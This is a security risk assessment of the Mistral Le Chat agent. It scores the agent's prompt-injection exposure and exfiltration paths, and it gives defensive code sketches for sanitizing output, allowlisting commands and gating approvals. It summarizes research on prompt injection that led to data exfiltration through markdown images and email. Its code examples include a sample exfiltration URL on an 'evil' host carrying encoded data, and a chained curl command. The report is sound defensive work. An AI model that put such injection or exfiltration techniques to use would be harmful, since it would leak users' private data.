1 Key Risks
This section summarizes the most critical security risks an operator inherits when deploying this agent in its documented default configuration. Published research demonstrating prompt injection and data exfiltration against the production service, combined with absent output filtering and no documented monitoring, creates an input-to-egress attack chain that operators cannot observe.
2 AIRQ Scores
The four headline scores quantify how exposed the agent is, how damaging a successful attack would be, and how much the agent’s own controls reduce that risk. Mistral Le Chat shows a moderate composite driven by elevated input and output surfaces offset partially by sandboxed code execution and approval-gated MCP write operations.
The agent places in the Exposed Giants quadrant with attack surface above the midpoint, blast radius below the high-capability threshold, and defense controls covering less than a third of the available score range.
The axes do not share a common denominator: attack surface and blast radius are each scored out of ten, while defense controls and the composite AIRQ score are each scored out of fifteen.
| Metric | Score | Comments |
|---|---|---|
| AIRQ Score | 4.54 / 15 | The moderate composite reflects partial defense coverage that narrows the gap between capability exposure and available safeguards, leaving meaningful hardening headroom for operators. |
| Blast Radius | 5.87 / 10 | OAuth-scoped MCP connector tokens for enterprise services and outbound network access through web search and connector write functions drive the capability factors. |
| Attack Surface | 5.64 / 10 | Demonstrated exploitation on user input, tool execution, and output processing surfaces drives the attack score above midpoint with all three exfiltration preconditions met. |
| Defense Controls | 4 / 15 | Input moderation and sandboxed execution provide partial coverage while output guardrails and monitoring have nothing documented on the default configuration. |
3 Attack Surface
Attack surfaces are the entry points and interaction patterns through which adversarial input can reach the agent’s reasoning loop and steer its behavior. The agent ingests content from web search, uploaded documents, and MCP connectors while rendering rich markdown output and executing tools across a bash sandbox and enterprise service connectors.
Higher scores indicate broader exposure to adversarial input and weaker boundary controls; the surfaces scored at the 4 / 4 ceiling carry demonstrated exploitation evidence on the production service.
Each row names a distinct entry point into the agent's reasoning loop, its scored exposure level, and the evidence anchoring the assessment.
| Surface | Score | Comments |
|---|---|---|
| User Input | 4 / 4 | Web, mobile, API, and file upload channels accept input with content-safety moderation but no dedicated prompt injection shield; adversarial prompts achieved successful PII exfiltration on the production service. [3][5] |
| External Data | 3 / 4 | MCP connectors ingest data from enterprise platforms including email, code repositories, and project management tools; web search fetches content from untrusted URLs without documented content validation. [8] |
| Memory | 2 / 4 | Custom instructions persist across sessions as manual-only writes; the opt-in Memories feature adds automated cross-session saving but remains disabled on the default configuration. [9] |
| Reasoning | 2 / 4 | Multi-step reasoning operates within conversation scope with model selection but no documented chain-of-thought audit or reasoning transparency for the operator. [4][5] |
| Planning | 2 / 4 | Work mode decomposes tasks into tool calls with user-visible execution steps and no plan-level approval gate; planning scope stays within the active conversation. [5][6] |
| Tool Execution | 4 / 4 | Code Interpreter, bash sandbox, web search, and MCP write functions compose a multi-tool surface; research demonstrated tool misuse for data exfiltration on the production service. [3][6] |
| Orchestration | 2 / 4 | Multi-step task execution runs within user-supervised sessions with parallel tool calls; no background processes, scheduling, or headless daemon operation is documented. [5][6] |
| Inter-Agent | 2 / 4 | MCP connectors bridge the agent to external services including custom server URLs with no documented inter-agent message integrity verification or authentication protocol. [8] |
| Output Processing | 4 / 4 | Rich markdown with image rendering and MCP write functions carry no output DLP; research demonstrated exfiltration via markdown images and email-based output encoding on the production service. [1][3] |
| Configuration | 2 / 4 | Custom instructions and connector settings are managed through the settings UI with explicit user action; a vendor SDK supply chain incident and custom MCP server URLs highlight supply chain vetting gaps. [2][5] |
The Lethal Trifecta is triggered when an agent processes untrusted content, accesses private data, and communicates externally in the same session — the three conditions that turn an isolated prompt injection into full-chain exfiltration. Le Chat ingests adversary-authored content through web search and MCP connectors, holds OAuth-scoped tokens for enterprise services, and renders rich markdown output that has been demonstrated as an exfiltration channel.
Mistral Le Chat exhibits all three of these conditions in its documented default configuration:
- Untrusted input — Content fetched via web search, user-uploaded files, and enterprise connector payloads from external platforms carry adversary-authored bytes into the reasoning context. [5][8]
- Sensitive data — OAuth-scoped MCP connectors access private enterprise data from code repositories, email inboxes, project boards, and payment platforms on behalf of the operator. [8]
- External egress — Markdown image rendering, web search outbound requests, and MCP connector write functions that send email and post to collaboration platforms provide default egress channels. [1][3]
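The three-condition test above can be written as a simple predicate over a session's capabilities. The following is a minimal sketch for illustration only: the `SessionProfile` type and its field names are hypothetical and do not correspond to any Mistral API.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class SessionProfile:
    """Hypothetical summary of what a single agent session can do."""
    ingests_untrusted_content: bool  # e.g. web search results, uploads, connector payloads
    accesses_private_data: bool      # e.g. OAuth-scoped connector reads
    can_egress: bool                 # e.g. image rendering, connector write functions


def lethal_trifecta(profile: SessionProfile) -> bool:
    """Return True only when all three conditions hold in the same session."""
    return (
        profile.ingests_untrusted_content
        and profile.accesses_private_data
        and profile.can_egress
    )


default_session = SessionProfile(True, True, True)
egress_blocked = SessionProfile(True, True, False)
print(lethal_trifecta(default_session))  # True
print(lethal_trifecta(egress_blocked))   # False
```

Removing any one of the three conditions breaks the chain, which is why the hardening tips later in the report concentrate on the egress side.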
4 Blast Radius
The blast radius is what an attacker who controls the agent can reach — which systems they touch, which credentials they read, and which actions they take without operator approval. A successful compromise reaches sandboxed code execution, scoped file access, OAuth-scoped enterprise credentials, and outbound network connectivity through MCP connectors and web search.
Higher blast scores indicate broader reach from a compromised agent session, with network and credential factors elevated by the MCP connector framework's OAuth integration scope.
Each row ties a scored capability factor to the specific workflow node, OAuth scope, or sandbox boundary that determines how far a compromised session can reach.
| Factor | Score | Comments |
|---|---|---|
| Code execution | 2 / 4 | Sandboxed Python Code Interpreter has no internet access; Work mode adds a scoped bash sandbox for multi-step agentic tool execution within the operator's session. [5][6] |
| File system access | 2 / 4 | File access is scoped to uploaded documents within the current conversation; no access to the operator's local file system or home directory is documented. [5] |
| Network access | 3 / 4 | MCP connectors make outbound calls to enterprise APIs; web search fetches content from the open web; Code Interpreter has no network access by design. [6][8] |
| Credential access | 3 / 4 | OAuth tokens for enterprise platforms including code repositories, email, project boards, and payment processors are held by the MCP connector framework with per-function authorization. [8] |
| Autonomous action | 2 / 4 | Work mode selects tools autonomously and gates write operations behind approval prompts; the progressive allowlist can permanently exempt individual functions from future approval. [6] |
| Deployment access | 2 / 4 | Vibe Code Workflow creates draft pull requests on connected code repositories but has no direct infrastructure deployment or package publishing capability documented. [5] |
5 Defense Controls
Defense controls are what the agent’s own architecture does to detect, contain, and report attacks before they reach the operator’s systems. Default controls provide ML-based input moderation and sandboxed code execution while leaving output filtering, exfiltration prevention, and operator-facing monitoring entirely undocumented.
Higher scores indicate stronger vendor-implemented safeguards on the default configuration; unlike the attack surface and blast radius tables, a higher number here is better, and the shortfall from the maximum marks the gap between available protection and full coverage.
Each component is scored against what the vendor documents for the default configuration, with confidence reflecting the evidence tier for the control's existence.
| Component | Score | Comments |
|---|---|---|
| Input Guardrails | 1 / 3 | ML-based moderation classifier covers jailbreaking detection among nine policy categories, but no dedicated prompt injection shield or instruction hierarchy separation is documented on the default configuration. [7] |
| Execution Isolation | 2 / 3 | Code Interpreter runs in a vendor-documented sandboxed environment with no internet access; specific container technology and escape testing results are not publicly available. [5][10] |
| Action Controls | 1 / 3 | Approval gates require operator confirmation for MCP connector write operations, but the session-persistent progressive allowlist permanently exempts approved functions without automatic expiry or re-authentication, meeting the downgrade criteria. [6] |
| Output Guardrails | 0 / 3 | No output-specific DLP, exfiltration blocking, credential redaction, or URL sanitization is documented; research demonstrated data exfiltration through markdown rendering and email output. [1][3] |
| Monitoring | 0 / 3 | The vendor privacy policy references data retention for abuse monitoring but no operator-facing audit logging, SIEM forwarding, or anomaly detection is publicly documented. [10][11] |
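As a quick arithmetic check, the component scores in the table can be summed and compared with the headline figure. The report does not state the aggregation rule, so the sketch below assumes a plain sum, which does reproduce the 4 / 15 headline and the "less than a third" coverage claim.

```python
# Component scores copied from the Defense Controls table (each out of 3).
components = {
    "Input Guardrails": 1,
    "Execution Isolation": 2,
    "Action Controls": 1,
    "Output Guardrails": 0,
    "Monitoring": 0,
}
MAX_PER_COMPONENT = 3

total = sum(components.values())
maximum = MAX_PER_COMPONENT * len(components)
coverage = total / maximum  # assumption: the headline is a plain sum

print(f"{total} / {maximum} = {coverage:.1%}")  # 4 / 15 = 26.7%
```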
6 Hardening Tips
This section lists concrete actions an operator can take to reduce the risks reported above, grouped by the defense control each tip strengthens. Operators should prioritize output-layer exfiltration controls, monitoring instrumentation, and tightening the progressive approval allowlist to close the demonstrated input-to-egress attack chain.
Input Guardrails
Input guardrails intercept adversarial content before it reaches the reasoning loop.
- Policy: Require all MCP connector inputs to pass through a secondary prompt injection classifier before reaching the model reasoning context.
- Configuration: Configure the moderation API thresholds to maximum sensitivity for the jailbreaking category across all enterprise deployments.
- Engineering: Deploy a dedicated prompt shield or instruction hierarchy separation layer between system prompts and user-provided or tool-retrieved content.
Execution Isolation
Execution isolation contains what a compromised agent can do on the host.
- Policy: Restrict Work mode bash sandbox capabilities to a curated command allowlist and disable shell access for non-administrative user roles.
- Configuration: Set per-session file upload limits and enforce automatic workspace purge after each Code Interpreter run to prevent data accumulation across tasks.
- Engineering: Implement container escape detection and runtime security monitoring for all sandbox execution environments used by the agent.
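A curated command allowlist, as suggested in the policy tip above, could be enforced by a small pre-execution check. This is a sketch under stated assumptions: the allowlist contents are hypothetical, the function is not part of Work mode, and it presumes the operator controls a layer that sees each command line before it reaches the sandbox.

```python
import shlex

# Hypothetical allowlist; a real deployment would derive this from policy.
ALLOWED_COMMANDS = {"ls", "cat", "grep", "wc"}

# Characters that enable chaining, redirection, or substitution in a shell.
# Rejecting them anywhere in the line is deliberately conservative: it also
# blocks harmless quoted uses.
SHELL_METACHARACTERS = set(";|&<>`$\n")


def is_command_allowed(command_line: str) -> bool:
    """Allow a command only if it is a single allowlisted program invocation."""
    if any(ch in SHELL_METACHARACTERS for ch in command_line):
        return False
    try:
        tokens = shlex.split(command_line)
    except ValueError:
        # Unbalanced quotes and similar parse errors are rejected outright.
        return False
    return bool(tokens) and tokens[0] in ALLOWED_COMMANDS


print(is_command_allowed("ls -la"))                          # True
print(is_command_allowed("cat notes.txt; curl example.net")) # False
```

Interpreters such as `python3` are left off the example allowlist on purpose, since allowing one would let arbitrary code bypass the check.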
Action Controls
Action controls govern which tools and actions the agent can invoke autonomously.
- Policy: Require periodic re-authentication for MCP connector write operations and disable the progressive allowlist feature that permanently bypasses approval.
- Configuration: Configure per-connector scope restrictions to limit which MCP functions are available to each organizational role.
- Engineering: Build a deny-by-default policy engine that requires explicit operator approval for each new MCP connector function category.
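The deny-by-default idea, combined with approvals that expire rather than persist, might look like the sketch below. The `ApprovalPolicy` class, the TTL value, and the connector and function names are all hypothetical and are not drawn from the vendor's connector framework.

```python
import time
from typing import Dict, Optional, Tuple


class ApprovalPolicy:
    """Deny-by-default gate for connector functions (hypothetical design).

    Approvals are keyed by (connector, function) and expire after a TTL,
    so no function is exempted from review permanently.
    """

    def __init__(self, ttl_seconds: float = 3600.0) -> None:
        self.ttl_seconds = ttl_seconds
        self._approved_at: Dict[Tuple[str, str], float] = {}

    def approve(self, connector: str, function: str,
                now: Optional[float] = None) -> None:
        """Record an explicit operator approval with a timestamp."""
        self._approved_at[(connector, function)] = (
            time.time() if now is None else now
        )

    def is_allowed(self, connector: str, function: str,
                   now: Optional[float] = None) -> bool:
        """Return True only for an approval that exists and has not expired."""
        current = time.time() if now is None else now
        approved_at = self._approved_at.get((connector, function))
        if approved_at is None:
            return False  # never approved: deny by default
        if current - approved_at > self.ttl_seconds:
            del self._approved_at[(connector, function)]
            return False  # approval expired: require fresh confirmation
        return True


policy = ApprovalPolicy(ttl_seconds=60)
policy.approve("email", "send_message", now=0)
print(policy.is_allowed("email", "send_message", now=30))    # True
print(policy.is_allowed("email", "send_message", now=120))   # False
print(policy.is_allowed("email", "delete_message", now=30))  # False
```

The explicit `now` parameter exists only to make the expiry behavior easy to demonstrate; in normal use the wall clock is read.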
Output Guardrails
Output guardrails inspect what the agent sends to other systems and users.
- Policy: Require all agent output to pass through a DLP classifier that blocks credential patterns, PII, and encoded data before rendering.
- Configuration: Disable markdown image rendering from external URLs and block Base64-encoded content in all agent output channels.
- Engineering: Deploy an output sanitization layer that strips or rewrites URLs in markdown images and hyperlinks to prevent rendering-based exfiltration.
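An output sanitization layer of the kind described above could start with markdown images, the channel demonstrated in the cited research. The sketch below assumes the operator can post-process agent output before it is rendered; the allowlisted host is a placeholder, and the pattern covers only inline `![alt](url)` images, not reference-style images or raw HTML.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts from which images may be rendered.
ALLOWED_IMAGE_HOSTS = {"assets.example.com"}

# Matches inline markdown images: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def sanitize_markdown_images(text: str) -> str:
    """Replace images whose host is not allowlisted with a text placeholder."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlparse(url).hostname or ""
        if host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)  # keep trusted images unchanged
        # Dropping the URL prevents the renderer from issuing a request
        # that could carry data in its path or query string.
        return f"[image removed: {alt}]"

    return IMAGE_PATTERN.sub(replace, text)


risky = "See ![chart](https://evil.example.net/p.png?d=c2VjcmV0) now"
print(sanitize_markdown_images(risky))  # See [image removed: chart] now
```

Relative URLs have no hostname and are therefore removed as well, which is the safer default for a first pass.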
Monitoring
Monitoring captures what the agent did and surfaces anomalies for review.
- Policy: Mandate weekly review of agent conversation logs for prompt injection indicators, abnormal connector call volumes, and unauthorized data-access patterns, with SIEM forwarding and 90-day retention.
- Configuration: Enable conversation-level monitoring dashboards that surface anomalous patterns such as repeated tool failures or unusual data access volumes.
- Engineering: Implement behavioral anomaly detection that alerts on prompt injection signatures, exfiltration patterns, and privilege escalation attempts across agent sessions.
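One of the simpler signals named above, abnormal connector call volume, can be approximated with a per-session count compared against a baseline. This is a minimal sketch assuming the operator already has call events available as `(session_id, connector)` pairs; the event shape, baseline values, and thresholds are all hypothetical.

```python
from collections import Counter
from typing import Dict, Iterable, List, Tuple


def flag_call_spikes(
    events: Iterable[Tuple[str, str]],
    baseline: Dict[str, float],
    multiplier: float = 3.0,
    min_calls: int = 5,
) -> List[Tuple[str, str, int]]:
    """Flag (session, connector) pairs whose call count is unusually high.

    A pair is flagged when its count reaches the larger of `min_calls` and
    `multiplier` times the connector's baseline calls per session.
    """
    counts = Counter(events)
    flagged = []
    for (session_id, connector), count in sorted(counts.items()):
        threshold = max(min_calls, multiplier * baseline.get(connector, 0.0))
        if count >= threshold:
            flagged.append((session_id, connector, count))
    return flagged


events = [("s1", "email")] * 12 + [("s2", "email")] * 2 + [("s1", "repo")] * 4
baseline = {"email": 3.0, "repo": 2.0}
print(flag_call_spikes(events, baseline))  # [('s1', 'email', 12)]
```

A fixed multiplier is a crude stand-in for real anomaly detection, but it gives reviewers a concrete starting list for the weekly log review.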
7 References
This section lists the evidence base behind every score and finding in the profile, grouped by source type so the reader can verify any claim. Numbers in brackets throughout the report (e.g. [1][3]) refer to the entries below, which are listed in citation order.
Selected Vulnerabilities
- [1] Le Chat data exfiltration via email. 0din.ai disclosure: indirect prompt injection via MCP email on production Le Chat (2026-03-05)
- [2] Mistral SDK supply chain (GHSA-wx9m-wx4f-4cmg). CVSS 9.6: malicious dropper in mistralai PyPI 2.4.6 via TanStack supply chain (2026-05)
Selected Research
- [3] Imprompter: Tricking LLM Agents into Improper Tool Use. PII exfiltration on production Mistral Le Chat with 80% success rate (2024)
- [4] ChatInject: Chat Template Abuse for Prompt Injection. Class-level: 32-52% attack success rate on frontier LLMs including Mistral models (2025)
Vendor Documentation
- [5] Le Chat product overview. Vendor docs: Le Chat tools and modes
- [6] Work mode documentation. Multi-step agent harness with bash sandbox and approval gates
- [7] Moderation and Guardrailing. ML-based classifier with 9 policy categories including jailbreaking
- [8] MCP Connectors documentation. 20+ connectors plus custom MCP server support
- [9] Memories documentation. Opt-in cross-session persistent memory with graph-based architecture
Other Sources
- [10] Mistral AI Trust Center. Vendor trust and security resources hub
- [11] Mistral AI Privacy Policy. Data retention and training opt-out policies